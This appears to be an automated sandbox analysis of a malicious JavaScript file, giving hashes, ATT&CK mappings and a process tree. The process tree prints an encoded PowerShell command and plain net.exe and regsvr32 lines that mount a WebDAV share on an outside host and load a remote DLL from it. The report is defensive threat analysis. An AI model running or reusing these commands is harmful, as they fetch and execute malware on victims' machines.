0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
20/08/2024, 14:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c.js
Size

13KB
MD5

9bc4f73e7159cf45dfb20db78240c671
SHA1

8c3a77d8268755fcdace5fbc5544d890cf694e20
SHA256

0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c
SHA512

19b294158f52069dfc409b654376fb3337890c8354bb1b51b0c0ec0bb571762490e0b941c0900730ac3891c4f64e61ae12ef839278c2c4c2a90bea5f9da849d7
SSDEEP

96:j9PfCI9V4AAd4d8Eo7t43ZY8Xs903gtoIlykvXj1u6I0PCq903gtoIlykvXj1uKP:9f4I6M67

Score

6^/10

defense_evasion execution

Malware Config

Signatures

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2404	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2404	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

description	pid	Process	procid_target
PID 2360 wrote to memory of 2404	2360	wscript.exe	30
PID 2360 wrote to memory of 2404	2360	wscript.exe	30
PID 2360 wrote to memory of 2404	2360	wscript.exe	30
PID 2404 wrote to memory of 2324	2404	powershell.exe	32
PID 2404 wrote to memory of 2324	2404	powershell.exe	32
PID 2404 wrote to memory of 2324	2404	powershell.exe	32
PID 2404 wrote to memory of 1020	2404	powershell.exe	34
PID 2404 wrote to memory of 1020	2404	powershell.exe	34
PID 2404 wrote to memory of 1020	2404	powershell.exe	34
PID 2404 wrote to memory of 1020	2404	powershell.exe	34
PID 2404 wrote to memory of 1020	2404	powershell.exe	34

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\0394b4dab5a978c75c4cb6e44c85df9093506d4b80ffaa76c49cd9d049d80d6c.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADcANAA5ADUAMQA3ADYANwA1ADEAMAA4ADYAMAAuAGQAbABsAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2404
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\
    3⤵
    PID:2324
- - C:\Windows\system32\regsvr32.exe
    "C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\74951767510860.dll
    3⤵
    PID:1020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2404-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

Filesize
4KB

Download
memory/2404-5-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2404-8-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2404-7-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2404-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2404-9-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2404-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2404-11-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2404-12-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download